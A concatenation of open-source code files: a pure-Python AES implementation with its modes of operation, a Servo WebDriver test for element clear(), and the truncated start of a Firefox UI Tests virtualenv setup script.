U3 = [ 0x00000000, 0x0d0b0e09, 0x1a161c12, 0x171d121b, 0x342c3824, 0x3927362d, 0x2e3a2436, 0x23312a3f, 0x68587048, 0x65537e41, 0x724e6c5a, 0x7f456253, 0x5c74486c, 0x517f4665, 0x4662547e, 0x4b695a77, 0xd0b0e090, 0xddbbee99, 0xcaa6fc82, 0xc7adf28b, 0xe49cd8b4, 0xe997d6bd, 0xfe8ac4a6, 0xf381caaf, 0xb8e890d8, 0xb5e39ed1, 0xa2fe8cca, 0xaff582c3, 0x8cc4a8fc, 0x81cfa6f5, 0x96d2b4ee, 0x9bd9bae7, 0xbb7bdb3b, 0xb670d532, 0xa16dc729, 0xac66c920, 0x8f57e31f, 0x825ced16, 0x9541ff0d, 0x984af104, 0xd323ab73, 0xde28a57a, 0xc935b761, 0xc43eb968, 0xe70f9357, 0xea049d5e, 0xfd198f45, 0xf012814c, 0x6bcb3bab, 0x66c035a2, 0x71dd27b9, 0x7cd629b0, 0x5fe7038f, 0x52ec0d86, 0x45f11f9d, 0x48fa1194, 0x03934be3, 0x0e9845ea, 0x198557f1, 0x148e59f8, 0x37bf73c7, 0x3ab47dce, 0x2da96fd5, 0x20a261dc, 0x6df6ad76, 0x60fda37f, 0x77e0b164, 0x7aebbf6d, 0x59da9552, 0x54d19b5b, 0x43cc8940, 0x4ec78749, 0x05aedd3e, 0x08a5d337, 0x1fb8c12c, 0x12b3cf25, 0x3182e51a, 0x3c89eb13, 0x2b94f908, 0x269ff701, 0xbd464de6, 0xb04d43ef, 0xa75051f4, 0xaa5b5ffd, 0x896a75c2, 0x84617bcb, 0x937c69d0, 0x9e7767d9, 0xd51e3dae, 0xd81533a7, 0xcf0821bc, 0xc2032fb5, 0xe132058a, 0xec390b83, 0xfb241998, 0xf62f1791, 0xd68d764d, 0xdb867844, 0xcc9b6a5f, 0xc1906456, 0xe2a14e69, 0xefaa4060, 0xf8b7527b, 0xf5bc5c72, 0xbed50605, 0xb3de080c, 0xa4c31a17, 0xa9c8141e, 0x8af93e21, 0x87f23028, 0x90ef2233, 0x9de42c3a, 0x063d96dd, 0x0b3698d4, 0x1c2b8acf, 0x112084c6, 0x3211aef9, 0x3f1aa0f0, 0x2807b2eb, 0x250cbce2, 0x6e65e695, 0x636ee89c, 0x7473fa87, 0x7978f48e, 0x5a49deb1, 0x5742d0b8, 0x405fc2a3, 0x4d54ccaa, 0xdaf741ec, 0xd7fc4fe5, 0xc0e15dfe, 0xcdea53f7, 0xeedb79c8, 0xe3d077c1, 0xf4cd65da, 0xf9c66bd3, 0xb2af31a4, 0xbfa43fad, 0xa8b92db6, 0xa5b223bf, 0x86830980, 0x8b880789, 0x9c951592, 0x919e1b9b, 0x0a47a17c, 0x074caf75, 0x1051bd6e, 0x1d5ab367, 0x3e6b9958, 0x33609751, 0x247d854a, 0x29768b43, 0x621fd134, 0x6f14df3d, 0x7809cd26, 0x7502c32f, 0x5633e910, 0x5b38e719, 0x4c25f502, 0x412efb0b, 0x618c9ad7, 0x6c8794de, 0x7b9a86c5, 0x769188cc, 0x55a0a2f3, 0x58abacfa, 
0x4fb6bee1, 0x42bdb0e8, 0x09d4ea9f, 0x04dfe496, 0x13c2f68d, 0x1ec9f884, 0x3df8d2bb, 0x30f3dcb2, 0x27eecea9, 0x2ae5c0a0, 0xb13c7a47, 0xbc37744e, 0xab2a6655, 0xa621685c, 0x85104263, 0x881b4c6a, 0x9f065e71, 0x920d5078, 0xd9640a0f, 0xd46f0406, 0xc372161d, 0xce791814, 0xed48322b, 0xe0433c22, 0xf75e2e39, 0xfa552030, 0xb701ec9a, 0xba0ae293, 0xad17f088, 0xa01cfe81, 0x832dd4be, 0x8e26dab7, 0x993bc8ac, 0x9430c6a5, 0xdf599cd2, 0xd25292db, 0xc54f80c0, 0xc8448ec9, 0xeb75a4f6, 0xe67eaaff, 0xf163b8e4, 0xfc68b6ed, 0x67b10c0a, 0x6aba0203, 0x7da71018, 0x70ac1e11, 0x539d342e, 0x5e963a27, 0x498b283c, 0x44802635, 0x0fe97c42, 0x02e2724b, 0x15ff6050, 0x18f46e59, 0x3bc54466, 0x36ce4a6f, 0x21d35874, 0x2cd8567d, 0x0c7a37a1, 0x017139a8, 0x166c2bb3, 0x1b6725ba, 0x38560f85, 0x355d018c, 0x22401397, 0x2f4b1d9e, 0x642247e9, 0x692949e0, 0x7e345bfb, 0x733f55f2, 0x500e7fcd, 0x5d0571c4, 0x4a1863df, 0x47136dd6, 0xdccad731, 0xd1c1d938, 0xc6dccb23, 0xcbd7c52a, 0xe8e6ef15, 0xe5ede11c, 0xf2f0f307, 0xfffbfd0e, 0xb492a779, 0xb999a970, 0xae84bb6b, 0xa38fb562, 0x80be9f5d, 0x8db59154, 0x9aa8834f, 0x97a38d46 ]
U4 = [ 0x00000000, 0x090d0b0e, 0x121a161c, 0x1b171d12, 0x24342c38, 0x2d392736, 0x362e3a24, 0x3f23312a, 0x48685870, 0x4165537e, 0x5a724e6c, 0x537f4562, 0x6c5c7448, 0x65517f46, 0x7e466254, 0x774b695a, 0x90d0b0e0, 0x99ddbbee, 0x82caa6fc, 0x8bc7adf2, 0xb4e49cd8, 0xbde997d6, 0xa6fe8ac4, 0xaff381ca, 0xd8b8e890, 0xd1b5e39e, 0xcaa2fe8c, 0xc3aff582, 0xfc8cc4a8, 0xf581cfa6, 0xee96d2b4, 0xe79bd9ba, 0x3bbb7bdb, 0x32b670d5, 0x29a16dc7, 0x20ac66c9, 0x1f8f57e3, 0x16825ced, 0x0d9541ff, 0x04984af1, 0x73d323ab, 0x7ade28a5, 0x61c935b7, 0x68c43eb9, 0x57e70f93, 0x5eea049d, 0x45fd198f, 0x4cf01281, 0xab6bcb3b, 0xa266c035, 0xb971dd27, 0xb07cd629, 0x8f5fe703, 0x8652ec0d, 0x9d45f11f, 0x9448fa11, 0xe303934b, 0xea0e9845, 0xf1198557, 0xf8148e59, 0xc737bf73, 0xce3ab47d, 0xd52da96f, 0xdc20a261, 0x766df6ad, 0x7f60fda3, 0x6477e0b1, 0x6d7aebbf, 0x5259da95, 0x5b54d19b, 0x4043cc89, 0x494ec787, 0x3e05aedd, 0x3708a5d3, 0x2c1fb8c1, 0x2512b3cf, 0x1a3182e5, 0x133c89eb, 0x082b94f9, 0x01269ff7, 0xe6bd464d, 0xefb04d43, 0xf4a75051, 0xfdaa5b5f, 0xc2896a75, 0xcb84617b, 0xd0937c69, 0xd99e7767, 0xaed51e3d, 0xa7d81533, 0xbccf0821, 0xb5c2032f, 0x8ae13205, 0x83ec390b, 0x98fb2419, 0x91f62f17, 0x4dd68d76, 0x44db8678, 0x5fcc9b6a, 0x56c19064, 0x69e2a14e, 0x60efaa40, 0x7bf8b752, 0x72f5bc5c, 0x05bed506, 0x0cb3de08, 0x17a4c31a, 0x1ea9c814, 0x218af93e, 0x2887f230, 0x3390ef22, 0x3a9de42c, 0xdd063d96, 0xd40b3698, 0xcf1c2b8a, 0xc6112084, 0xf93211ae, 0xf03f1aa0, 0xeb2807b2, 0xe2250cbc, 0x956e65e6, 0x9c636ee8, 0x877473fa, 0x8e7978f4, 0xb15a49de, 0xb85742d0, 0xa3405fc2, 0xaa4d54cc, 0xecdaf741, 0xe5d7fc4f, 0xfec0e15d, 0xf7cdea53, 0xc8eedb79, 0xc1e3d077, 0xdaf4cd65, 0xd3f9c66b, 0xa4b2af31, 0xadbfa43f, 0xb6a8b92d, 0xbfa5b223, 0x80868309, 0x898b8807, 0x929c9515, 0x9b919e1b, 0x7c0a47a1, 0x75074caf, 0x6e1051bd, 0x671d5ab3, 0x583e6b99, 0x51336097, 0x4a247d85, 0x4329768b, 0x34621fd1, 0x3d6f14df, 0x267809cd, 0x2f7502c3, 0x105633e9, 0x195b38e7, 0x024c25f5, 0x0b412efb, 0xd7618c9a, 0xde6c8794, 0xc57b9a86, 0xcc769188, 0xf355a0a2, 0xfa58abac, 
0xe14fb6be, 0xe842bdb0, 0x9f09d4ea, 0x9604dfe4, 0x8d13c2f6, 0x841ec9f8, 0xbb3df8d2, 0xb230f3dc, 0xa927eece, 0xa02ae5c0, 0x47b13c7a, 0x4ebc3774, 0x55ab2a66, 0x5ca62168, 0x63851042, 0x6a881b4c, 0x719f065e, 0x78920d50, 0x0fd9640a, 0x06d46f04, 0x1dc37216, 0x14ce7918, 0x2bed4832, 0x22e0433c, 0x39f75e2e, 0x30fa5520, 0x9ab701ec, 0x93ba0ae2, 0x88ad17f0, 0x81a01cfe, 0xbe832dd4, 0xb78e26da, 0xac993bc8, 0xa59430c6, 0xd2df599c, 0xdbd25292, 0xc0c54f80, 0xc9c8448e, 0xf6eb75a4, 0xffe67eaa, 0xe4f163b8, 0xedfc68b6, 0x0a67b10c, 0x036aba02, 0x187da710, 0x1170ac1e, 0x2e539d34, 0x275e963a, 0x3c498b28, 0x35448026, 0x420fe97c, 0x4b02e272, 0x5015ff60, 0x5918f46e, 0x663bc544, 0x6f36ce4a, 0x7421d358, 0x7d2cd856, 0xa10c7a37, 0xa8017139, 0xb3166c2b, 0xba1b6725, 0x8538560f, 0x8c355d01, 0x97224013, 0x9e2f4b1d, 0xe9642247, 0xe0692949, 0xfb7e345b, 0xf2733f55, 0xcd500e7f, 0xc45d0571, 0xdf4a1863, 0xd647136d, 0x31dccad7, 0x38d1c1d9, 0x23c6dccb, 0x2acbd7c5, 0x15e8e6ef, 0x1ce5ede1, 0x07f2f0f3, 0x0efffbfd, 0x79b492a7, 0x70b999a9, 0x6bae84bb, 0x62a38fb5, 0x5d80be9f, 0x548db591, 0x4f9aa883, 0x4697a38d ]
    def __init__(self, key):
        """
        Expand `key` into the encryption (_Ke) and decryption (_Kd) round
        key schedules, following FIPS-197 section 5.2 (key expansion) and
        section 5.3 (the decryption round-key transform).

        @param key: a byte string of length 16, 24 or 32 (AES-128/192/256).
        @raise ValueError: for any other key length.
        """
        if len(key) not in (16, 24, 32):
            raise ValueError('Invalid key size')
        # 10, 12 or 14 rounds, selected by key length via the class-level
        # number_of_rounds table (defined above this view).
        rounds = self.number_of_rounds[len(key)]
        # Encryption round keys
        self._Ke = [[0] * 4 for i in xrange(rounds + 1)]
        # Decryption round keys
        self._Kd = [[0] * 4 for i in xrange(rounds + 1)]
        round_key_count = (rounds + 1) * 4
        # KC: number of 32-bit words in the key.
        KC = len(key) // 4
        # Convert the key into ints (big-endian signed 32-bit words)
        tk = [ struct.unpack('>i', key[i:i + 4])[0] for i in xrange(0, len(key), 4) ]
        # Copy values into round key arrays
        for i in xrange(0, KC):
            self._Ke[i // 4][i % 4] = tk[i]
            self._Kd[rounds - (i // 4)][i % 4] = tk[i]
        # Key expansion (fips-197 section 5.2)
        rconpointer = 0
        t = KC
        while t < round_key_count:
            # RotWord + SubWord of the previous word, xor-ed with the round
            # constant (Rcon), applied to the first word of each key block.
            tt = tk[KC - 1]
            tk[0] ^= ((self.S[(tt >> 16) & 0xFF] << 24) ^
                      (self.S[(tt >> 8) & 0xFF] << 16) ^
                      (self.S[ tt & 0xFF] << 8) ^
                      self.S[(tt >> 24) & 0xFF] ^
                      (self.rcon[rconpointer] << 24))
            rconpointer += 1
            if KC != 8:
                for i in xrange(1, KC):
                    tk[i] ^= tk[i - 1]
            # Key expansion for 256-bit keys is "slightly different" (fips-197)
            else:
                for i in xrange(1, KC // 2):
                    tk[i] ^= tk[i - 1]
                # The middle word receives an extra SubWord (no rotation).
                tt = tk[KC // 2 - 1]
                tk[KC // 2] ^= (self.S[ tt & 0xFF] ^
                                (self.S[(tt >> 8) & 0xFF] << 8) ^
                                (self.S[(tt >> 16) & 0xFF] << 16) ^
                                (self.S[(tt >> 24) & 0xFF] << 24))
                for i in xrange(KC // 2 + 1, KC):
                    tk[i] ^= tk[i - 1]
            # Copy values into round key arrays
            j = 0
            while j < KC and t < round_key_count:
                self._Ke[t // 4][t % 4] = tk[j]
                self._Kd[rounds - (t // 4)][t % 4] = tk[j]
                j += 1
                t += 1
        # Inverse-Cipher-ify the decryption round key (fips-197 section 5.3).
        # InvMixColumns is applied via the U1..U4 lookup tables; the first and
        # last round keys are deliberately left untransformed.
        for r in xrange(1, rounds):
            for j in xrange(0, 4):
                tt = self._Kd[r][j]
                self._Kd[r][j] = (self.U1[(tt >> 24) & 0xFF] ^
                                  self.U2[(tt >> 16) & 0xFF] ^
                                  self.U3[(tt >> 8) & 0xFF] ^
                                  self.U4[ tt & 0xFF])
    def encrypt(self, plaintext):
        """
        Encrypt a block of plain text using the AES block cipher.

        @param plaintext: a sequence of exactly 16 byte values.
        @return: a list of 16 ints (the ciphertext bytes).
        @raise ValueError: if the block is not 16 bytes long.
        """
        if len(plaintext) != 16:
            raise ValueError('wrong block length')
        rounds = len(self._Ke) - 1
        # Row offsets for ShiftRows in the encryption direction.
        (s1, s2, s3) = [1, 2, 3]
        a = [0, 0, 0, 0]
        # Convert plaintext to (ints ^ key) -- the initial AddRoundKey step.
        t = [(_compact_word(plaintext[4 * i:4 * i + 4]) ^ self._Ke[0][i]) for i in xrange(0, 4)]
        # Apply round transforms.  SubBytes/ShiftRows/MixColumns/AddRoundKey
        # are fused into the precomputed T1..T4 lookup tables.
        for r in xrange(1, rounds):
            for i in xrange(0, 4):
                a[i] = (self.T1[(t[ i ] >> 24) & 0xFF] ^
                        self.T2[(t[(i + s1) % 4] >> 16) & 0xFF] ^
                        self.T3[(t[(i + s2) % 4] >> 8) & 0xFF] ^
                        self.T4[ t[(i + s3) % 4] & 0xFF] ^
                        self._Ke[r][i])
            t = copy.copy(a)
        # The last round is special: no MixColumns, just S-box plus key.
        result = [ ]
        for i in xrange(0, 4):
            tt = self._Ke[rounds][i]
            result.append((self.S[(t[ i ] >> 24) & 0xFF] ^ (tt >> 24)) & 0xFF)
            result.append((self.S[(t[(i + s1) % 4] >> 16) & 0xFF] ^ (tt >> 16)) & 0xFF)
            result.append((self.S[(t[(i + s2) % 4] >> 8) & 0xFF] ^ (tt >> 8)) & 0xFF)
            result.append((self.S[ t[(i + s3) % 4] & 0xFF] ^ tt ) & 0xFF)
        return result
    def decrypt(self, ciphertext):
        """
        Decrypt a block of cipher text using the AES block cipher.

        @param ciphertext: a sequence of exactly 16 byte values.
        @return: a list of 16 ints (the plaintext bytes).
        @raise ValueError: if the block is not 16 bytes long.
        """
        if len(ciphertext) != 16:
            raise ValueError('wrong block length')
        rounds = len(self._Kd) - 1
        # Row offsets for the inverse ShiftRows (mirror of encryption's 1,2,3).
        (s1, s2, s3) = [3, 2, 1]
        a = [0, 0, 0, 0]
        # Convert ciphertext to (ints ^ key) -- the initial AddRoundKey step.
        t = [(_compact_word(ciphertext[4 * i:4 * i + 4]) ^ self._Kd[0][i]) for i in xrange(0, 4)]
        # Apply round transforms.  The inverse SubBytes/ShiftRows/MixColumns/
        # AddRoundKey steps are fused into the precomputed T5..T8 tables.
        for r in xrange(1, rounds):
            for i in xrange(0, 4):
                a[i] = (self.T5[(t[ i ] >> 24) & 0xFF] ^
                        self.T6[(t[(i + s1) % 4] >> 16) & 0xFF] ^
                        self.T7[(t[(i + s2) % 4] >> 8) & 0xFF] ^
                        self.T8[ t[(i + s3) % 4] & 0xFF] ^
                        self._Kd[r][i])
            t = copy.copy(a)
        # The last round is special: inverse S-box (Si) plus key only.
        result = [ ]
        for i in xrange(0, 4):
            tt = self._Kd[rounds][i]
            result.append((self.Si[(t[ i ] >> 24) & 0xFF] ^ (tt >> 24)) & 0xFF)
            result.append((self.Si[(t[(i + s1) % 4] >> 16) & 0xFF] ^ (tt >> 16)) & 0xFF)
            result.append((self.Si[(t[(i + s2) % 4] >> 8) & 0xFF] ^ (tt >> 8)) & 0xFF)
            result.append((self.Si[ t[(i + s3) % 4] & 0xFF] ^ tt ) & 0xFF)
        return result
class Counter(object):
    '''A big-endian counter value for the Counter (CTR) mode of operation.

    To create a custom counter, you can usually just override the
    increment method.'''

    def __init__(self, initial_value = 1):
        # Store the value big-endian as a list of 16 byte-sized ints.
        self._counter = [ ((initial_value >> i) % 256) for i in xrange(128 - 8, -1, -8) ]

    value = property(lambda s: s._counter)

    def increment(self):
        '''Increment the counter (overflow rolls back to 0).'''
        idx = len(self._counter) - 1
        while idx >= 0:
            self._counter[idx] += 1
            if self._counter[idx] < 256:
                return
            # This byte overflowed; zero it and carry into the next one.
            self._counter[idx] = 0
            idx -= 1
        # Every byte carried: the counter wrapped around to all zeros.
        self._counter = [ 0 ] * len(self._counter)
class AESBlockModeOfOperation(object):
    '''Super-class for AES modes of operation that require blocks.

    Subclasses must override encrypt() and decrypt().'''

    def __init__(self, key):
        # The underlying AES block cipher, keyed with `key`.
        self._aes = AES(key)

    def decrypt(self, ciphertext):
        '''Decrypt one block; must be implemented by a subclass.'''
        # NotImplementedError is the idiomatic abstract-method exception; it
        # subclasses Exception, so existing `except Exception` callers still work.
        raise NotImplementedError('not implemented')

    def encrypt(self, plaintext):
        '''Encrypt one block; must be implemented by a subclass.'''
        raise NotImplementedError('not implemented')
class AESStreamModeOfOperation(AESBlockModeOfOperation):
    '''Base class for the AES modes of operation that act as stream-ciphers.'''
class AESSegmentModeOfOperation(AESStreamModeOfOperation):
    '''Base class for the AES stream modes that process data in segments.'''

    # Default segment size, in bytes.
    segment_bytes = 16
class AESModeOfOperationECB(AESBlockModeOfOperation):
    '''AES Electronic Codebook Mode of Operation.

       o Block-cipher, so data must be padded to 16 byte boundaries

    Security Notes:
       o This mode is not recommended
       o Any two identical blocks produce identical encrypted values,
         exposing data patterns. (See the image of Tux on wikipedia)

    Also see:
       o https://en.wikipedia.org/wiki/Block_cipher_mode_of_operation#Electronic_codebook_.28ECB.29
       o See NIST SP800-38A (http://csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdf); section 6.1'''

    name = "Electronic Codebook (ECB)"

    def encrypt(self, plaintext):
        '''Encrypt exactly one 16-byte block.'''
        if len(plaintext) != 16:
            raise ValueError('plaintext block must be 16 bytes')
        block = _string_to_bytes(plaintext)
        return _bytes_to_string(self._aes.encrypt(block))

    def decrypt(self, ciphertext):
        '''Decrypt exactly one 16-byte block.'''
        if len(ciphertext) != 16:
            raise ValueError('ciphertext block must be 16 bytes')
        block = _string_to_bytes(ciphertext)
        return _bytes_to_string(self._aes.decrypt(block))
class AESModeOfOperationCBC(AESBlockModeOfOperation):
    '''AES Cipher-Block Chaining Mode of Operation.

       o The Initialization Vector (IV)
       o Block-cipher, so data must be padded to 16 byte boundaries
       o An incorrect initialization vector will only cause the first
         block to be corrupt; all other blocks will be intact
       o A corrupt bit in the cipher text will cause a block to be
         corrupted, and the next block to be inverted, but all other
         blocks will be intact.

    Security Notes:
       o This method (and CTR) ARE recommended.

    Also see:
       o https://en.wikipedia.org/wiki/Block_cipher_mode_of_operation#Cipher-block_chaining_.28CBC.29
       o See NIST SP800-38A (http://csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdf); section 6.2'''

    name = "Cipher-Block Chaining (CBC)"

    def __init__(self, key, iv = None):
        # Validate first, then seed the chaining block with the IV (or zeros).
        if iv is not None and len(iv) != 16:
            raise ValueError('initialization vector must be 16 bytes')
        if iv is None:
            self._last_cipherblock = [ 0 ] * 16
        else:
            self._last_cipherblock = _string_to_bytes(iv)

        AESBlockModeOfOperation.__init__(self, key)

    def encrypt(self, plaintext):
        if len(plaintext) != 16:
            raise ValueError('plaintext block must be 16 bytes')

        block = _string_to_bytes(plaintext)
        # Chain: xor with the previous ciphertext block before encrypting.
        mixed = [ (p ^ l) for (p, l) in zip(block, self._last_cipherblock) ]
        self._last_cipherblock = self._aes.encrypt(mixed)

        return _bytes_to_string(self._last_cipherblock)

    def decrypt(self, ciphertext):
        if len(ciphertext) != 16:
            raise ValueError('ciphertext block must be 16 bytes')

        block = _string_to_bytes(ciphertext)
        decrypted = self._aes.decrypt(block)
        # Un-chain: xor with the previous ciphertext block after decrypting.
        plaintext = [ (p ^ l) for (p, l) in zip(decrypted, self._last_cipherblock) ]
        self._last_cipherblock = block

        return _bytes_to_string(plaintext)
class AESModeOfOperationCFB(AESSegmentModeOfOperation):
    '''AES Cipher Feedback Mode of Operation.

       o A stream-cipher, so input does not need to be padded to blocks,
         but does need to be padded to segment_size

    Also see:
       o https://en.wikipedia.org/wiki/Block_cipher_mode_of_operation#Cipher_feedback_.28CFB.29
       o See NIST SP800-38A (http://csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdf); section 6.3'''

    name = "Cipher Feedback (CFB)"

    def __init__(self, key, iv, segment_size = 1):
        # A zero segment size makes no sense; fall back to single bytes.
        if segment_size == 0: segment_size = 1

        if iv is None:
            self._shift_register = [ 0 ] * 16
        elif len(iv) != 16:
            raise ValueError('initialization vector must be 16 bytes')
        else:
            self._shift_register = _string_to_bytes(iv)

        self._segment_bytes = segment_size

        AESBlockModeOfOperation.__init__(self, key)

    segment_bytes = property(lambda s: s._segment_bytes)

    def encrypt(self, plaintext):
        if len(plaintext) % self._segment_bytes != 0:
            raise ValueError('plaintext block must be a multiple of segment_size')

        data = _string_to_bytes(plaintext)

        # Process the input one segment at a time.
        encrypted = [ ]
        for start in xrange(0, len(data), self._segment_bytes):
            segment = data[start: start + self._segment_bytes]
            # The keystream is the encrypted shift register, truncated to
            # the segment length.
            keystream = self._aes.encrypt(self._shift_register)[:len(segment)]
            cipher_segment = [ (p ^ k) for (p, k) in zip(segment, keystream) ]

            # Shift the oldest bytes out and the new ciphertext in.
            self._shift_register = _concat_list(self._shift_register[len(cipher_segment):], cipher_segment)

            encrypted.extend(cipher_segment)

        return _bytes_to_string(encrypted)

    def decrypt(self, ciphertext):
        if len(ciphertext) % self._segment_bytes != 0:
            raise ValueError('ciphertext block must be a multiple of segment_size')

        data = _string_to_bytes(ciphertext)

        decrypted = [ ]
        for start in xrange(0, len(data), self._segment_bytes):
            cipher_segment = data[start: start + self._segment_bytes]
            keystream = self._aes.encrypt(self._shift_register)[:len(cipher_segment)]
            plain_segment = [ (c ^ k) for (c, k) in zip(cipher_segment, keystream) ]

            # Decryption feeds the *ciphertext* back into the shift register.
            self._shift_register = _concat_list(self._shift_register[len(cipher_segment):], cipher_segment)

            decrypted.extend(plain_segment)

        return _bytes_to_string(decrypted)
class AESModeOfOperationOFB(AESStreamModeOfOperation):
    '''AES Output Feedback Mode of Operation.

       o A stream-cipher, so input does not need to be padded to blocks,
         allowing arbitrary length data.
       o A bit twiddled in the cipher text twiddles the same bit in the
         plain text, which can be useful for error correction techniques.

    Also see:
       o https://en.wikipedia.org/wiki/Block_cipher_mode_of_operation#Output_feedback_.28OFB.29
       o See NIST SP800-38A (http://csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdf); section 6.4'''

    name = "Output Feedback (OFB)"

    def __init__(self, key, iv = None):
        # Validate first, then seed the feedback block with the IV (or zeros).
        if iv is not None and len(iv) != 16:
            raise ValueError('initialization vector must be 16 bytes')
        if iv is None:
            self._last_precipherblock = [ 0 ] * 16
        else:
            self._last_precipherblock = _string_to_bytes(iv)

        # Keystream bytes generated but not yet consumed.
        self._remaining_block = [ ]

        AESBlockModeOfOperation.__init__(self, key)

    def encrypt(self, plaintext):
        output = [ ]
        for byte in _string_to_bytes(plaintext):
            if not self._remaining_block:
                # Refill the keystream by encrypting the previous block.
                self._remaining_block = self._aes.encrypt(self._last_precipherblock)
                self._last_precipherblock = [ ]
            keystream_byte = self._remaining_block.pop(0)
            self._last_precipherblock.append(keystream_byte)
            output.append(byte ^ keystream_byte)
        return _bytes_to_string(output)

    def decrypt(self, ciphertext):
        # AES-OFB is symmetric: decryption is identical to encryption.
        return self.encrypt(ciphertext)
class AESModeOfOperationCTR(AESStreamModeOfOperation):
    '''AES Counter Mode of Operation.

       o A stream-cipher, so input does not need to be padded to blocks,
         allowing arbitrary length data.
       o The counter must be the same size as the key size (ie. len(key))
       o Each block is independent of the others, so a corrupt byte will
         not damage future blocks.
       o Each block has a unique counter value associated with it, which
         contributes to the encrypted value, so no data patterns are
         leaked.
       o Also known as: Counter Mode (CM), Integer Counter Mode (ICM) and
         Segmented Integer Counter (SIC)

    Security Notes:
       o This method (and CBC) ARE recommended.
       o Each message block is associated with a counter value which must be
         unique for ALL messages with the same key. Otherwise security may be
         compromised.

    Also see:
       o https://en.wikipedia.org/wiki/Block_cipher_mode_of_operation#Counter_.28CTR.29
       o See NIST SP800-38A (http://csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdf); section 6.5
         and Appendix B for managing the initial counter'''

    name = "Counter (CTR)"

    def __init__(self, key, counter = None):
        AESBlockModeOfOperation.__init__(self, key)

        if counter is None:
            counter = Counter()

        self._counter = counter
        # Keystream bytes generated but not yet consumed.
        self._remaining_counter = [ ]

    def encrypt(self, plaintext):
        # Generate enough keystream to cover the whole input.
        while len(self._remaining_counter) < len(plaintext):
            self._remaining_counter += self._aes.encrypt(self._counter.value)
            self._counter.increment()

        data = _string_to_bytes(plaintext)
        encrypted = [ (p ^ k) for (p, k) in zip(data, self._remaining_counter) ]
        self._remaining_counter = self._remaining_counter[len(encrypted):]

        return _bytes_to_string(encrypted)

    def decrypt(self, crypttext):
        # AES-CTR is symmetric: decryption is identical to encryption.
        return self.encrypt(crypttext)
# Simple lookup table for each mode
AESModesOfOperation = {
    'ctr': AESModeOfOperationCTR,
    'cbc': AESModeOfOperationCBC,
    'cfb': AESModeOfOperationCFB,
    'ecb': AESModeOfOperationECB,
    'ofb': AESModeOfOperationOFB,
}
| gpl-2.0 |
stshine/servo | tests/wpt/web-platform-tests/old-tests/webdriver/user_input/clear_test.py | 142 | 2601 | # -*- mode: python; fill-column: 100; comment-column: 100; -*-
import os
import sys
import unittest
sys.path.insert(1, os.path.abspath(os.path.join(__file__, "../..")))
import base_test
from selenium.common import exceptions
class ElementClearTest(base_test.WebDriverBaseTest):
    """WebDriver element clear() conformance tests.

    Each test loads a fixture page, finds the target element and checks
    that clear() empties writable elements while raising
    InvalidElementStateException for disabled and read-only ones.
    """

    def test_writable_text_input_element_should_clear(self):
        self.driver.get(self.webserver.where_is("user_input/res/element_clear_writable_input_page.html"))
        e = self.driver.find_element_by_css_selector("#writableTextInput")
        e.clear()
        self.assertEqual("", e.get_attribute("value"))

    def test_disabled_text_input_element_should_not_clear(self):
        self.driver.get(self.webserver.where_is("user_input/res/element_clear_disabled_input_page.html"))
        e = self.driver.find_element_by_css_selector("#disabledTextInput")
        self.assertRaises(exceptions.InvalidElementStateException, lambda: e.clear())

    def test_read_only_text_input_element_should_not_clear(self):
        self.driver.get(self.webserver.where_is("user_input/res/element_clear_readonly_input_page.html"))
        e = self.driver.find_element_by_css_selector("#readOnlyTextInput")
        self.assertRaises(exceptions.InvalidElementStateException, lambda: e.clear())

    def test_writable_text_area_element_should_clear(self):
        self.driver.get(self.webserver.where_is("user_input/res/element_clear_writable_textarea_page.html"))
        e = self.driver.find_element_by_css_selector("#writableTextArea")
        e.clear()
        self.assertEqual("", e.get_attribute("value"))

    def test_disabled_text_area_element_should_not_clear(self):
        self.driver.get(self.webserver.where_is("user_input/res/element_clear_disabled_textarea_page.html"))
        e = self.driver.find_element_by_css_selector("#disabledTextArea")
        self.assertRaises(exceptions.InvalidElementStateException, lambda: e.clear())

    # BUG FIX: this method was previously also named
    # test_read_only_text_input_element_should_not_clear, which silently
    # overwrote the input-element test above so that test never ran.
    def test_read_only_text_area_element_should_not_clear(self):
        self.driver.get(self.webserver.where_is("user_input/res/element_clear_readonly_textarea_page.html"))
        e = self.driver.find_element_by_css_selector("#readOnlyTextArea")
        self.assertRaises(exceptions.InvalidElementStateException, lambda: e.clear())

    def test_content_editable_area_should_clear(self):
        self.driver.get(self.webserver.where_is("user_input/res/element_clear_contenteditable_page.html"))
        e = self.driver.find_element_by_css_selector("#contentEditableElement")
        e.clear()
        self.assertEqual("", e.text)
# Allow running this test module directly with the stock unittest runner.
if __name__ == "__main__":
    unittest.main()
| mpl-2.0 |
myrdd/firefox-ui-tests | create_venv.py | 2 | 3999 | #!/usr/bin/env python
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
"""
The script can be used to setup a virtual environment for running Firefox UI Tests.
It will automatically install the firefox ui test package, all its dependencies,
and optional packages if specified.
"""
import argparse
import os
import shutil
import subprocess
import sys
import urllib2
import zipfile
# Link to the folder, which contains the zip archives of virtualenv
VIRTUALENV_URL = 'https://github.com/pypa/virtualenv/archive/%(VERSION)s.zip'
VIRTUALENV_VERSION = '12.1.1'
here = os.path.dirname(os.path.abspath(__file__))
venv_script_path = 'Scripts' if sys.platform == 'win32' else 'bin'
venv_activate = os.path.join(venv_script_path, 'activate')
venv_activate_this = os.path.join(venv_script_path, 'activate_this.py')
venv_python_bin = os.path.join(venv_script_path, 'python')
usage_message = """
***********************************************************************
To run the Firefox UI Tests, activate the virtual environment:
{}{}
See firefox-ui-tests --help for all options
***********************************************************************
"""
def download(url, target):
    """Downloads the specified url to the given target.

    Returns the path of the downloaded file.
    """
    response = urllib2.urlopen(url)
    try:
        with open(target, 'wb') as f:
            f.write(response.read())
    finally:
        # Always release the HTTP connection, even if the read/write fails
        # (the original leaked the response object).
        response.close()

    return target
def create_virtualenv(target, python_bin=None):
    """Download virtualenv and use it to create a fresh environment at `target`.

    python_bin: optional path to the Python interpreter the new environment
    should use (forwarded to virtualenv via its `-p` option).
    """
    script_path = os.path.join(here, 'virtualenv-%s' % VIRTUALENV_VERSION,
                               'virtualenv.py')

    print 'Downloading virtualenv %s' % VIRTUALENV_VERSION
    zip_path = download(VIRTUALENV_URL % {'VERSION': VIRTUALENV_VERSION},
                        os.path.join(here, 'virtualenv.zip'))

    try:
        with zipfile.ZipFile(zip_path, 'r') as f:
